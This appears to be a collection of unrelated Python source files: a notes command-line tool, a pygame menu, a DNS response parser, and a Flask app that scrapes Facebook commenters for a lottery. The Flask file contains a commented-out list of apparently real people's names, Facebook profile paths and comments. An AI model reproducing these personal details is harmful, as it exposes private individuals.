@Notes.subcommand("find")
class find(cli.Application):
"search on notes file for keywords"
def main(self, *keywords: str):
key = " ".join(keywords).lower()
found = 0
if not os.path.exists(file):
print("no notes.txt file found")
else :
for line in open(file,"r"):
if key in line.lower():
print(line)
found += 1
if found is False:
print("key not found \n")
@Notes.subcommand("done")
class done(cli.Application):
"check the notes that has been done, ask for a keyword"
def main(self, *keywords: str):
key = " ".join(keywords).lower()
found = 0
if not os.path.exists(file):
print("no notes.txt file found, add a note to create it")
else :
copy = "copynotes.txt"
c = open(path + copy,"w+")
f = open(file,"r")
for line in f:
if key in line.lower():
green_tick = colors.green | "\u2713"
line = line.replace("[ ]","["+green_tick+"]")
c.write(line)
found += 1
else :
c.write(line)
c.close()
f.close()
if found is False:
print("key not found")
else:
mv = local["mv"]
mv(path+copy,file)
@Notes.subcommand("clear")
class clear(cli.Application):
"""it will clear ALL the notes if no options are given,\n
else it will clear Notes with a given keyword.\n
Flag -d will clear ticked notes.
"""
done_clear = cli.Flag(["d","done"], help = "it will clear ticked notes")
def main(self, *keywords : str):
if not os.path.exists(file):
print("no notes.txt file found, add a note to create it")
elif len(keywords) == 0 and not self.done_clear:
rm = local["rm"]
rm(file)
elif len(keywords) == 0 and self.done_clear:
key = " ".join(keywords)
found = 0
green_tick = colors.green | "\u2713"
copy = path + "copynotes.txt"
c = open(copy,"w+")
f = open(file,"r")
for line in f:
if green_tick in line:
found += 1
else :
c.write(line)
f.close()
c.close()
if found is 0:
print (green_tick + " not found", end = "\n")
else :
mv = local["mv"]
mv(copy, file)
else :
found = 0
key = " ".join(keywords)
key = key.lower()
copy = path + "copynotes.txt"
c = open(copy,"w+")
f = open(file,"r")
for line in f:
if key in line.lower():
found += 1
else :
c.write(line)
f.close()
c.close()
if found is 0:
print ("keyword not found", end = "\n")
else :
mv = local["mv"]
mv(copy, file)
if __name__ == "__main__":
Notes.run()
|
995,055 | fd5b9b3334554a3705b209651135ab2b5a3ea676 | import sys, os, pygame
from pygame.locals import *
from Scene import Scene
class menuScreen(Scene): #Menu class for the menu screen
def __init__(self, width=300,height=300):
pygame.init()#starts pygame
self.width=width#sets width of window
self.height=height#sets height of window
self.background=pygame.image.load(os.path.join("images","menuScreen.jpg"))#loads the image ready for use
self.screen=pygame.display.set_mode((self.width,self.height))#displays the screen
def draw(self):
self.screen.blit(self.background,(0,0))
def update(self):
u=1
def event(self,events):
"""
Handle all input events here
"""
for event in events:
if event.type == KEYDOWN:
if event.key == K_RETURN:#starts the game
self.game.gotoMain()
#print "r"
if event.key == K_ESCAPE:#quits the game
sys.exit(0)
|
995,056 | 7fde4a17fa340847430bd2ac643a7a170236f94b | import struct
class DnsResponseBuilder():
def __init__(self, data, query_length, url, q_id):
self.header = {}
self.records = []
self.data = data
self.is_valid = False
self.length = query_length
self.qtype = None
self.url = url
self.q_id = q_id
self.additional = []
self.answer = None
def create_header(self):
'''
The DNS Header has exactly 12 butes, each equally divided into 2 bytes,
namely identification number, flags, number of queries, number of
responses, number of authoratative responses and number of additional
answers
'''
tuple_data_dns = struct.unpack('!HHHHHH', self.data[:12])
data_to_pass = {}
identification = tuple_data_dns[0]
'''
Identifcation number to match the response with the query when
multiple dns requests are made by the same machine.
'''
flags = tuple_data_dns[1]
'''
Flags contain 16-bits, and the order is:
16 - QR (1 = Response)
17, 20 - Opcode (0 = Standard Query, 1 = Inverse Query)
21 - Authoratative flag (1 = Authoratative Answer)
22 - Truncated flag (1 = Truncated)
23 - Recursion desired (1 = Desired)
24 - Recursion available (1 = Support available)
25 - Z
26, 27 - Not important for now
28, 31 - Response code.
'''
data_to_pass['is_query'] = (flags & 32768) != 0
data_to_pass['opcode'] = (flags & 30720) >> 11
data_to_pass['auth_ans'] = (flags & 1024) != 0
data_to_pass['truncated'] = (flags & 512) != 0
data_to_pass['recursion_wanted'] = (flags & 256) != 0
data_to_pass['recursion_supported'] = (flags & 128) != 0
data_to_pass['present_in_zone'] = not(bool((flags & 112) >> 4))
data_to_pass['rcode'] = flags & 15
data_to_pass['identification'] = identification
data_to_pass['num_queries'] = tuple_data_dns[2]
data_to_pass['num_response'] = tuple_data_dns[3]
data_to_pass['num_authority'] = tuple_data_dns[4]
data_to_pass['num_additional'] = tuple_data_dns[5]
self.header = data_to_pass
def error_check(self):
rcode = self.header['rcode']
if rcode == 0:
self.is_valid = True
self.error = (0, 'NOERROR: Query Completed Successfully')
if self.header['identification'] != self.q_id:
self.error = (-1, 'Query ID and Response ID mismatch')
self.is_valid = False
else:
self.is_valid = False
if rcode == 1:
self.error = (1, 'FORMERR: Query Format Error')
elif rcode == 2:
self.error = (
2, 'SERVFAIL: Server failed to complete DNS request')
elif rcode == 3:
self.error = (3, 'NXDOMAIN: Domain Name does not exist')
elif rcode == 4:
self.error = (4, 'NOTIMP: Function not implemented')
elif rcode == 5:
self.error = (
5, 'REFUSED: The server refused to answer for the query')
elif rcode == 6:
self.error = (
6, 'YXDOMAIN: Name that should not exist, does exist')
elif rcode == 7:
self.error = (
7, 'XRRSET: RRset that should not exist, does exist')
elif rcode == 8:
self.error = (
8, 'NOTAUTH: Server not authoritative for the zone')
elif rcode == 9:
self.error = (9, 'NOTZONE: Name not in zone')
def parse(self):
num = 0
start = self.length
while num < self.header['num_response'] or num < self.header['num_authority'] or num < self.header['num_additional']:
tuple_data_dns = struct.unpack(
'!HHHLH', self.data[start:start + 12])
data_to_pass = {}
data_to_pass['name'] = tuple_data_dns[0]
data_to_pass['qtype'] = tuple_data_dns[1]
data_to_pass['qclass'] = tuple_data_dns[2]
data_to_pass['ttl'] = tuple_data_dns[3]
data_to_pass['response_length'] = tuple_data_dns[4]
data_to_pass['response_data'] = self.data[start +12:start + 12 + tuple_data_dns[4]]
num += 1
start += data_to_pass['response_length'] + 12
self.records.append(data_to_pass)
self.qtype = self.records[0]['qtype']
def decode_response(self):
if self.qtype == 1:
result = self.decode_A(self.records[:self.header['num_response']])
answer = 'Name: ' + result[0] + '\n' + 'Address: ' + result[1]
self.answer = answer
elif self.qtype == 28:
result = self.decode_AAAA(self.records[:self.header['num_response']])
answer = 'Name: ' + result[0] + '\n' + 'Address: ' + result[1]
self.answer = answer
elif self.qtype == 2:
result = self.decode_NS(self.records[:self.header['num_response']])
answer = ''
for line in result:
answer += self.url + '\t nameserver = ' + line + '\n'
self.answer = answer
elif self.qtype == 6:
result = self.decode_SOA(self.records[:self.header['num_response']])
answer = self.url + '\n'
answer += '\t orgin: ' + result[0] + '\n'
answer += '\t mail addr: ' + result[1] + '\n'
answer += '\t serial: ' + str(result[2]) + '\n'
answer += '\t refresh: ' + str(result[3]) + '\n'
answer += '\t retry: ' + str(result[4]) + '\n'
answer += '\t expire: ' + str(result[5]) + '\n'
answer += '\t minimum: ' + str(result[6]) + '\n'
self.answer = answer
elif self.qtype == 16:
result = self.decode_TXT(self.records[:self.header['num_response']])
answer = ''
for line in result:
answer += self.url + '\t' + line + '\n'
self.answer = answer
elif self.qtype == 15:
result = self.decode_MX(self.records[:self.header['num_response']])
answer = ''
for line in result:
answer += self.url + '\t mail exchanger = ' + \
str(line[0]) + ' ' + line[1] + '\n'
self.answer = answer
elif self.qtype == 12:
result = self.decode_PTR(self.records[:self.header['num_response']])
answer = ''
for line in result:
answer += self.url + '\t name = ' + line
self.answer = answer
else:
self.answer = 'The option is invalid'
if self.header['num_additional'] != 0:
temp = self.decode_NS(self.records[:self.header['num_response']])
index = 0
for record in self.records[self.header['num_response']:]:
if record['qtype'] == 1:
self.additional.append("{} has an internet address = {}\n".format(temp[index], self.decode_A([record])[1]))
index += 1
elif record['qtype'] == 28:
index -= 1
self.additional.append("{} has AAAA address = {}\n".format(temp[index], self.decode_AAAA([record])[1]))
index += 1
self.additional = ''.join(self.additional)
def decode_A(self, records):
data = struct.unpack('!BBBB', records[0]['response_data'])
data = list(map(lambda num: str(num), data))
return (self.url, ('.'.join(data)))
def decode_AAAA(self, records):
data = struct.unpack('!LLLL', records[0]['response_data'])
result = []
for num in data:
test = str(hex(num)[2:])
test = '0' * (8 - len(test)) + test
result.append(test[:4])
result.append(test[4:])
final = []
for index, num in enumerate(result):
test = num.lstrip('0')
if test != '':
final.append(test)
else:
temp = ''
flag = 0
while temp == '':
temp = result[index + 1].lstrip('0')
if temp == '':
result.pop(index + 1)
flag = 1
if flag == 0:
final.append('0')
else:
final.append('')
answer = ':'.join(final)
return (self.url, answer)
def decode_NS(self, records):
first_record = records[0]
length = first_record['response_data'][0]
bstream = 'c' * length
data = struct.unpack(
bstream, first_record['response_data'][1: length + 1])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result = [''.join(data)]
try:
pointer = struct.unpack(
'BB', first_record['response_data'][length + 1:])
if pointer[0] >> 6 == 3:
suffix = self.solve_pointer(pointer[1])
except Exception:
length = length + 1
suffix = ''
while length < first_record['response_length'] - 1:
newlen = first_record['response_data'][length]
if newlen == 192:
suffix += self.solve_pointer(first_record['response_data'][length + 1])
break
bstream = 'c' * newlen
data = struct.unpack(
bstream, first_record['response_data'][length + 1: length + 1 + newlen])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
suffix += ''.join(data) + '.'
length += newlen + 1
result[0] += '.' + suffix
for record in records[1:]:
length = first_record['response_data'][0]
bstream = 'c' * length
data = struct.unpack(
bstream, record['response_data'][1: length + 1])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result.append(''.join(data) + '.' + suffix)
return result
def decode_TXT(self, records):
result = []
for record in records:
result.append(str(record['response_data'][1:], 'utf-8'))
return result
def decode_MX(self, records):
answer = []
for record in records:
pref = record['response_data'][1]
i = 2
result = ''
while i < record['response_length'] - 2:
length = record['response_data'][i]
if length != 192:
bstream = 'c' * length
data = struct.unpack(
bstream, record['response_data'][i + 1: i + 1 + length])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
data = ''.join(data)
result += data + '.'
i += 1 + length
else:
result += self.solve_pointer(
record['response_data'][i + 1])
i += 1
if record['response_data'][i] == 192:
result += self.solve_pointer(
record['response_data'][i + 1]) + '.'
answer.append((pref, result))
return answer
def decode_SOA(self, records):
i = 0
answer = []
result = ''
record = records[0]
while True:
length = record['response_data'][i]
if length == 192:
result += self.solve_pointer(
record['response_data'][i + 1]) + '.'
i += 2
break
elif length == 0:
i += 1
break
else:
bstream = 'c' * length
data = struct.unpack(
bstream, record['response_data'][i + 1: i + 1 + length])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result += ''.join(data) + '.'
i += length + 1
answer.append(result)
j = i
while j < len(record['response_data']) and record['response_data'][j] != 192:
j += 1
result = ''
if j != len(record['response_data']):
bstream = 'c' * record['response_data'][i]
data = struct.unpack(bstream, record['response_data'][i + 1: j])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result += ''.join(data) + '.' + \
self.solve_pointer(record['response_data'][j + 1])
i = j + 2
else:
while True:
length = record['response_data'][i]
if length == 192:
result += self.solve_pointer(
record['response_data'][i + 1]) + '.'
i += 2
break
elif length == 0:
i += 1
break
else:
bstream = 'c' * length
data = struct.unpack(
bstream, record['response_data'][i + 1: i + 1 + length])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
result += ''.join(data) + '.'
i += length + 1
answer.append(result)
for index in range(0, len(record['response_data'][i:]), 4):
data = struct.unpack(
'BBBB', record['response_data'][i + index: i + index + 4])
result = []
for index, num in enumerate(data):
result.append(data[index] * (16 ** (2 * (3 - index))))
answer.append(sum(result))
return answer
def decode_PTR(self, records):
final = []
for record in records:
newlen = 0
data = record['response_data']
result = ''
answer = []
while newlen < len(record['response_data']):
length = data[newlen]
if length == 0:
break
if length == 192:
answer.append(self.solve_pointer(
record['response_data'][newlen + 1]))
break
bstream = 'c' * length
result = struct.unpack(
bstream, data[newlen + 1: newlen + 1 + length])
newlen += length + 1
result = list(map(lambda letter: str(letter, 'utf-8'), result))
answer.append(''.join(result))
final.append('.'.join(answer))
return final
def solve_pointer(self, start):
i = start
result = []
while True:
length = self.data[i]
if length == 0:
break
elif length == 192:
result.append(self.solve_pointer(self.data[i + 1]))
try:
bstream = length * 'c'
data = struct.unpack(bstream, self.data[i + 1: i + 1 + length])
data = list(map(lambda letter: str(letter, 'utf-8'), data))
data = ''.join(data)
i += 1 + length
result.append(data)
except Exception:
break
return '.'.join(result)
if __name__ == '__main__':
print('This is the file for the query class, run dns.py instead')
|
995,057 | 0ed556cd830050ec2b90cca708e95e112b10eef3 | # encoding=UTF-8
from flask import Flask, render_template, request, Response, redirect
import scraper
import lottery
import people_filter
import json
from config import config
import hw
app = Flask(__name__)
@app.after_request
def add_header(response): # disabled cached when debugging
response.cache_control.max_age = 1
return response
@app.route('/hw', methods=['POST'])
def do_hw():
food_name = request.form['food_name']
link = hw.run(food_name)
return redirect(link, code=302)
@app.route('/')
def index(): # get html page
return render_template('index.html', google_key=config.google_key)
@app.route('/scrapy', methods=['POST'])
def scrapy(): # post scrapy setting to backend
req = request.get_json() # get setting
# print(req)
if 'comment_options' in req: # if need comment
comment_options = {
'TAGS': int(req['comment_options']['tag']),
'TEXT': req['comment_options']['text']
}
else: # if dont need comment, set an empty comment_options
comment_options = {
'TAGS': 0,
'TEXT': ""
}
try:
post_url = req['post_link']
need_like = req['need_like']
like_people_list, comment_people_list = scraper.run(post_url, comment_options, need_like)
except Exception as e:
print("except QQQ", e, "QQWTF")
return str(e), 400
if need_like:
lottery_people_list = people_filter.filter_like(comment_people_list, like_people_list)
else:
lottery_people_list = comment_people_list
# print(lottery_people_list)
# lottery_people_list = [('Claire Wang', '/xiao.xu.315', '簡叡張玄Lee KevinBryan Hsaio財管怪人們快來填'), ('Claire Wang', '/xiao.xu.315', '陳品妤Hannah Hsu♥️'), ('Chung Fiona', '/chung.fiona.90', 'Hoi Ping GohHui YeeYi Qi Goh'), ('Chung Fiona', '/chung.fiona.90','何瑄芳快利用你廣大的人脈哈哈哈'), ('Claire Wang', '/xiao.xu.315', 'Chloe Lin莊筑茵許珈維林心瑜王筠婷幫忙填個ㄅ🙏'), ('Yvan Cai', '/yvan.cai.9', '生理性別 女生變選項2'), ('王品云', '/profile.php?id=100001701070269', '邱品勛問卷是不是放錯了'), ('邱品勛', '/profile.php?id=100002458246114', '黃彥鈞許智超康銘揚 (Louis Yang)周哲偉施吟儒 (Yin-Ju Shih)許佳暄高菲兒 (高菲)李頫劉柏毅許筑涵 (Hannah Hsu)快來救救我的期末 嗚嗚 也祝你們中獎!!!!'), ('黃思文', '/profile.php?id=100003474270513', '陳柏安 黃子席'), ('康銘揚', '/profile.php?id=100003364707234', '許智超 黃彥鈞 星巴克喝起來'), ('Melvin Xuan', '/melvinxuan816', '星巴克喝起來 Claudia Tung Crystal Wee'), ('王品云', '/profile.php?id=100001701070269', '星巴克抽起來! 陳毓珊 呂佳穎'), ('張菀庭', '/paula.chang.222', '星巴克喝起來 葉諠潔李容蘋'), ('Chung Fiona', '/chung.fiona.90', 'KaHei Chui張珮慈室友們救救我的期末❤️'), ('Chung Fiona', '/chung.fiona.90', 'Kelvin YapHowHow Jia JianTan Margin 小大一們幫忙填個 ❤️'), ('林心瑜', '/rhoda980224', '星巴克抽起來! 吳奕柔 蘇子淳'), ('陳品潔', '/profile.php?id=100004430224605', '星巴克抽起來!陳信甫 Cht Yang'), ('徐藝庭', '/xu.t.ting.7', '星巴克抽起來! 林余柔 葉楹茹'), ('Chung Fiona', '/chung.fiona.90', 'Eva LaiKhor Yi YingTan Jou TingZyin ChoyRayne HohShiyuan Sy 大家有空的話幫忙填喔'), ('Claire Wang', '/xiao.xu.315', '謝竣竤黃芝穎徐湘淇方小瑀徐郁淳幫我填~~~~~❤️'), ('林佳融', '/profile.php?id=100002739680101', '倪芃宥 劉溦洵 星巴克喝起來'), ('許智超', '/witty.hsu', '星巴克喝起來!邱品勛 周新淳'), ('Crystal Ooi', '/jin0812', '星巴克抽起來! Tina Huang Athena Wong'), ('陳姿吟', '/profile.php?id=100000528432603', '星巴克抽起來! 陳怡安 蘇梅子'), ('王喬奕', '/profile.php?id=100004299759970', '星巴克抽起來! 陳宥滏 葉彥志'), ('Claire Wang', '/xiao.xu.315', '蔡雨華汪佩璇康育誠Allan Chen~~~'), ('Yvan Cai', '/yvan.cai.9', '星巴克抽起來! 楊彩柔謝育真喝咖啡打報告'), ('Zyin Choy', '/Zyinchoy', '星巴克抽起來!Ng Angie Lim Saw Yu'), ('吳芸安', '/profile.php?id=100003081041782', '星巴克抽起來!李季柔劉誼名'), ('Weeyi Lim', '/weeyi.lim.1', 'Yimin Hsieh 邱明欣'), ('Kelvin Yap', '/kelvinyapjk', '星巴克喝起來 Chey Siew Hui Yong Kai Wen'), ('陳詠晴', '/profile.php?id=100003473812196', '星巴克抽起來!Jo Yin Liao陳詠君'), ('何瑄芳', '/profile.php?id=100001720903109', '蔡喬羽 蔡瑞紘 劉書妤 簡敬堂 李思儀 李銘翰 星巴克抽起來!幫幫我室友Chung Fiona的期末🙏🙏🙏'), ('王意涵', '/miffy.wang.50', '星巴克抽起來!楊晴心 王品云'), ('史純睿', '/ray.shih.54', '星巴克抽起來! 王易達林琮軒'), ('Michael Wo', '/michael.wo.39','大推特推 徐丰毓Judy Chang李頫羅亞帆~~~~'), ('Chung Fiona', '/chung.fiona.90', 'Sophie Ellen Vincent Tjoe guys please ask ur friends for help 😄'), ('Weeyi Lim', '/weeyi.lim.1', 'Yimin Hsieh 邱明欣星巴克抽起來!'), ('陳信杰', '/profile.php?id=100001030551919', '星巴克抽起來!陳冠云黃勇誌'), ('洪振旂', '/alexpetertom', '星巴克抽起來! Jojo Chen 賴映竹'), ('張博涵', '/profile.php?id=100004785340097', '星巴克抽起來!Bryan Wang 葉孟昀'), ('陳欣妤', '/profile.php?id=100003493913557', '星巴克抽起來!黃欣儀闕千蘋'), ('黃郁茹', '/yuju.huang.756', '星巴克抽起來 楊岱瑾鐘曼綾'), ('許庭瑄', '/profile.php?id=100007970101021', '星巴克抽起來! 曹瑩琇 楊博傑'), ('陳怡安', '/profile.php?id=100005487766723', '星巴克抽起來!蘇梅子 陳姿吟'), ('楊喬茵', '/profile.php?id=100000361832779', '星巴克抽起來! 葉明瑜孫靖媛'), ('徐毓', '/yhsu2', '星巴克抽起來! 黃齡葦黃子庭'), ('Lala Chi', '/profile.php?id=100004356125645', '星巴克抽起來!陳信杰 林韋岑'), ('林亭', '/profile.php?id=100001936611960', '星巴克抽起來! 金喆义 秦昌慈'), ('劉冠履', '/profile.php?id=100009986258453', '星巴克抽起來! 葉明瑜 孫靖媛'), ('Jia Yu Cheng', '/jiayu.cheng.5', '星巴克抽起來!胡馨文陳思諪'), ('高士昌', '/scott.kao.73', '星巴克抽起來!愷宸張蘇晏加'), ('林韋岑', '/profile.php?id=100000474291276', '星巴克抽起來!Lala Chi 林品萱'), ('Hoi Ping Goh', '/hoiping.goh', '星巴克抽起來!How Jia JianBeeKee Soon'), ('吳貞慧', '/profile.php?id=100002109118707', '星巴克抽起來!沈宛臻古孟君'), ('林余柔', '/yuzo8866', '星巴克抽起來! 徐藝庭 傅有萱'), ('許佩琪', '/profile.php?id=100002511869301', '星巴克抽起來!楊雅筑Rita Yang'), ('How Jia Jian', '/jjhow17', '星巴克抽起來!Terry Lee Anis Wong'), ('愷宸張', '/profile.php?id=100003804896982', '星巴克抽起來! 蘇晏加 Kulas Isin'), ('林芯妘', '/profile.php?id=100003728904355', '星巴克抽起來!潘羿辰 謝沅沅'), ('簡志軒', '/profile.php?id=100006113199773', '星巴克抽起來!許睿恩王慈昱'), ('張珮慈', '/yoolite','星巴克抽起來! 彭湘晴 葉洧彤'), ('謝宜憫', '/profile.php?id=100004056912711', '星巴克抽起來! 邱明欣 Chi Cheng'), ('周筠容', '/profile.php?id=100002395696030', '星巴克抽起來! 丁紫芸 葉欣'), ('黃筠雅', '/profile.php?id=100002394356065', '星巴克抽起來!劉亭均何季蓉'), ('呂菱', '/arielluuu', '星巴克抽起來! 黃心瑜 余沁容'), ('Khor Yi Ying', '/yiying1219', 'Tan Jou Ting Zyin Choy星巴克喝起來'), ('Angel Hsu', '/angel.hsu.3591', '星巴克抽起來! 林亞嬛 Sherlyn Tania'), ('黃柏銘','/pming1226', '星巴克抽起來!黃千凱 (黃柾泰) Jing Wen'), ('王筠婷', '/profile.php?id=100003148398913', '星巴克抽起來!林佩萱郎曉言'), ('KaHei Chui', '/kahei.chui.5', '星巴克抽起來! 黃俊瑋Wong Hoi Ian'), ('盧昱均', '/yuchun.lu.5', '星巴克抽起來! 林顯宗 盧昱佑'), ('Jing Yang', '/profile.php?id=100002124153086', '星巴克抽起來! 李汶珈陳俞靜'), ('Nancy Lu','/lu.nancy.1', '星巴克抽起來!陳欐佳翁許方'), ('徐丰毓', '/edward.hsu.1217', '星巴克抽起來 吳知耕 陳昱愷'), ('何怡萱', '/chy880718', '星巴克抽起來!范馨之洪嘉君'), ('蔣其叡', '/ray.chiang.71', '星巴克抽起來!ShaoYu Hsu 楊品葦'), ('林旻', '/min.lin.50746', '星巴克抽起來! 王思尹李芷崴'), ('葉明諺', '/mingyen.yeh.5', '星巴克抽起來! 陳宴馨江美樺'), ('周祈鈞', '/profile.php?id=100009568613443', '星巴克抽起來!葉馨謝弦'), ('張皓鈞', '/profile.php?id=100000703535228', '星巴克抽起來!尹可親徐樹紅'), ('高鈺惠', '/ivy19900503', '星巴克抽起來!游子頤錢瑋'), ('謝巧琳', '/profile.php?id=100000494577498','星巴克抽起來! Cheah Bei Yi黃雪瑜'), ('陳思諪', '/cwendy830818', '星巴克抽起來! Jia Yu Cheng 胡馨文'), ('商婕瑜', '/jamie.shang.7', '星巴克抽起來!魏語欣 徐慕薇'), ('林孟璇', '/sherry.lin.896', '星巴克抽起來! 鄧雅云 邱華奕'), ('王雅琳','/profile.php?id=100003541445645', '鄭佑瑩周葦星巴克抽起來!'), ('陳秀玲', '/profile.php?id=100009155445602', '星巴克抽起來!朱子涵 陳竫涵'), ('丁紫芸', '/uternalsummer', '星巴克抽起來 傅靖文 Hsun Hui Wang'), ('蘇宥婕', '/profile.php?id=100000442011179', '星巴克抽起來!何思妘張瑜君'), ('顧采薇', '/profile.php?id=100003126297107', '星巴克抽起來! Tan Jia Shin Daisy Ho'), ('陳彥穎', '/profile.php?id=100003811547336', '星巴克抽起來! 闕珮庭 林侑萱'), ('Shiyuan Sy', '/shiyuan.sy', '星巴克抽起來! Annabelle Choo 黃雪瑜'), ('徐郁淳', '/profile.php?id=100000915669304', '星巴克抽起來!陳芝儀林欣儒'), ('周韋伶', '/weiling.zhou2', '星巴克抽起來!Chou Yuhsun Tina Huang'), ('Annabelle Choo', '/annabellechooxl', '王妤如 鄭之毓 星巴克抽起來!'), ('羅亞帆', '/profile.php?id=100001466886832', '星巴克抽起來! Jack Lee 張以臻'), ('黃妍婷', '/profile.php?id=100004162204699', '星巴克抽起來!陳琪 Athena Wong'), ('莊筑茵', '/profile.php?id=100000391609220', '星巴克抽起來葉致均林思妤'), ('李宜璉', '/profile.php?id=100002701763522', '星巴克抽起來!李雨璇 蔡之寧'), ('黃禹晴', '/profile.php?id=100006165698298', '星巴克抽起來!黃郁文黃琦軒'), ('余修誠', '/profile.php?id=1329335195', '星巴克抽起來!李佳蔚楊宗政'), ('彭佳文', '/rizu1867', '星巴克抽起來! 范馨之劉蕙榕 (Camille Liu)'), ('陳昱愷', '/profile.php?id=100002324028159', '星巴克抽起來 劉誠新蘇致瑋 我也好想做問卷😫'), ('施吟儒', '/yinju.shih.3', 'Done李欣容謝佳樺'), ('蔡喜善', '/profile.php?id=100002436548346', '星巴克抽起來! 王品云 王意涵'), ('丁希彤', '/claireting714', '星巴克抽起來趙芳瑀羅倩如'), ('陳彥華', '/profile.php?id=100003491228030', '星巴克抽起來 梁永強 Yucheng James Chu'), ('蘇蘇', '/profile.php?id=100000350261939', '星巴克抽起來!陳孟緯郭令瑜'), ('周采瑄', '/profile.php?id=100002612675055', '星巴克抽起來!全書亞Hamber Chang'), ('全書亞', '/profile.php?id=100003672586531', '星巴克抽起來周采瑄 方韻雯'), ('思穎', '/zhong.ying.9', '吉他社星巴克抽起來!拯救期末大作戰哈哈哈鄭雅云蕭伊涵林莉雯林承懌邱致柔朱光愷Cindy Lin劉玉孝Alex Yin洪振傑丁顯翔徐子瑤還有好多人喔歡迎大家來抽獎!!'), ('劉玉孝', '/profile.php?id=100004019411436', '洪振傑 林承懌感謝我ㄅ\n星巴克抽起來'), ('葉洧彤', '/ye.zi.980', '胡馨尹吳昱弘星巴克抽起來!'), ('邱致柔', '/amy.chiu.125', '朱易宣張文姿填問卷救室友思穎星巴克抽起來!'), ('楊恭豪', '/sun.how.71', '星巴克抽起來! 彭文亭 (WenTing Peng) 吳柏穎'), ('Hui Yee', '/Huiyee1998', '星巴克抽起來!Zyin ChoyRuo Thung'), ('Tan Margin', '/tan.margin.7', '星巴克抽起來!Duyen Vu Đào Anh Minh'), ('洪振傑', '/profile.php?id=100000400612298', '李優群 林緯程 星巴克抽起來!'), ('Yi Qi Goh', '/yiqi.gohelf', '星巴克抽起來!Hui Yee Hoi Ping Goh'), ('袁咏仪', '/jenny.g.jenny.3', '星巴克抽起來!BeeKee Soon Jo An'), ('Stacie Hsiao', '/stacie.hsiao', '紀妤岫施泯嘉星巴克抽起來!'), ('紀妤岫', '/rumvu', '星巴克抽起來!Stacie Hsiao邱聖雅'), ('Ruo Thung', '/ruo.tong', 'Eu Jing Fei Hoi Ping Goh星巴克抽起來!'), ('楊晏婷', '/pa.zou.73', '黃顗蓁 Sara Wu 星巴克抽起來'), ('陳彥慈', '/profile.php?id=100000586324433', '星巴克抽起來!劉北辰馬允中'), ('蔡佳茜', '/profile.php?id=100007083107521', '星巴克抽起來 Eric Ni 劉子琪'), ('梁艦尤', '/profile.php?id=100002023988441', '林彥廷 李治融'), ('林宜萱', '/sandylin.lin.92', '星巴克抽起來!黃大瑋 謝孟慈'), ('劉品婕', '/profile.php?id=100001432904325', '星巴克抽起來! 江佩芸何硯涵'), ('高巧玲', '/linda.kao.969', '星巴克抽起來!劉繡慈王珉婕'), ('劉繡慈', '/profile.php?id=100004122428050', '星巴克抽起來!高巧玲 黃冠穎'), ('詹珮渝', '/carol011629', '星巴克抽起來! 李承樺 Tsung Chen'), ('吳智穎', '/aaronlove1211', '星巴克抽起來!張雅涵 張馨文'), ('陳伯霏', '/profile.php?id=100001309787880', '星巴克抽起來! Godest Wang 黃品瑄'), ('黃品瑄', '/cheynehuang', '星巴克抽起來! 游皓鈞林勉'), ('蕭子勤', '/profile.php?id=100000359172345', '星巴克抽起來! 宋弘軒張郁怜'), ('陳巧蓉', '/ysesst95182', '星巴克抽起來!Bryson Caw 朱尹亘'), ('陳品婕', '/jessicayoya', '星巴克抽起來!Jacky Huang李梓翔'), ('鄭淨伃', '/profile.php?id=100006362441315', '徐維勵 施瑀嫺星巴克抽起來!'), ('王偉力', '/godest.wang', '星巴克抽起來! 于其弘 周俐廷'), ('Shu Lian', '/shu.lian.5', 'Hong DaTan Jia Shin 星巴克抽起來!'), ('Tan Jia Shin', '/tan.jiashin', '星巴克抽起來! 卓桐 鍾詠倫'), ('王泓詠', '/profile.php?id=100001694300374', '星巴克抽起來 林韋岑 劉紘與'), ('李昀', '/profile.php?id=100003402272483', '星巴克抽起來! 陳昕 張珈漩'), ('張芳瑄', '/1997jennie', '星巴克抽起來! 許東溢 鮑威宇'), ('黃語萱', '/profile.php?id=100002916605910', '黃浩瑀 陳宜涵 星巴克抽起來!'), ('范瑜庭', '/tina1226tina', '陳奐君 吳念蓁 星巴克抽起來!'), ('吳念蓁', '/profile.php?id=100000594528788', '古欣璇張榛芸星巴克抽起來!'), ('李鎧碩', '/ken.lee.1884', '星巴克抽起來!馬愷辰洪尹謙'), ('高慧君', '/profile.php?id=100013876578152', '陳昱臻 王懿柔 星巴克抽起來!'), ('蔡智伃', '/profile.php?id=100000369982431', '黃如霜朱翌甄星巴克抽起來!'), ('江芳瑜', '/profile.php?id=100002598245297', '星巴克抽起來!郭沛萱 陳品璇'), ('GloryLiang', '/glory.liang.9', '星巴克抽起來!許綺珊 黃郁茹'), ('愷欣', '/AdelineTin1205', '星巴克抽起來! 鍾詠倫 Yong Kai Wen'), ('邱明欣', '/profile.php?id=100003615537778', '星巴克抽起來!Yimin HsiehChi Cheng'), ('林欣儒', '/profile.php?id=100003302436199', '星巴克抽起來!郭嘉茵 陳韋君'), ('陳奕君', '/199526pig', '蘇毓涵徐若庭星巴克抽起來!'), ('吳恩庭', '/enting.wu1', '星巴克抽起來! 顏于傑吳恩庭'), ('蘇毓涵', '/katie.sue.940', '陳奕君徐若庭星巴克抽起來!'), ('李昱萱', '/profile.php?id=100002037107245', '星巴克抽起來! 魏家琳 關雅文 (Maggie Guan)'), ('羅歆瑜', '/pluviophilerusty', '星巴克抽起來! 張博涵 (Teresa Chang)王桂芳'), ('田佳欣', '/HaHaApril999', '郭子禎 湯芸藻 星巴克抽起來!'), ('陳潔慧', '/profile.php?id=100003653177937', 'Paula Liao 謝羽蓁星巴克抽起來!'), ('王桂芳', '/profile.php?id=100002846095042', '星巴克抽起來!張博涵 羅歆瑜'), ('張雅淇', '/vicky.chang.1048', '星巴克抽起來!林沛瑩 許家菱')]
if 'csv_options' in req:
options = req['csv_options']
index_type = options['type']
csv_people_list = options['data']
lottery_people_list = people_filter.filter_csv(csv_people_list, index_type, lottery_people_list)
final_list = [ {'name': d[0], 'url': d[1], 'comment': d[2], 'time': d[3]} for d in lottery_people_list ] # cast to json
# print(final_list)
return Response(json.dumps(final_list), mimetype='application/json')
@app.route('/lottery', methods=['POST'])
def get_lottery():
req = request.get_json()
try:
winner = lottery.run(req['prize'], req['legal_list'])
return Response(json.dumps(winner), mimetype='application/json')
except KeyError:
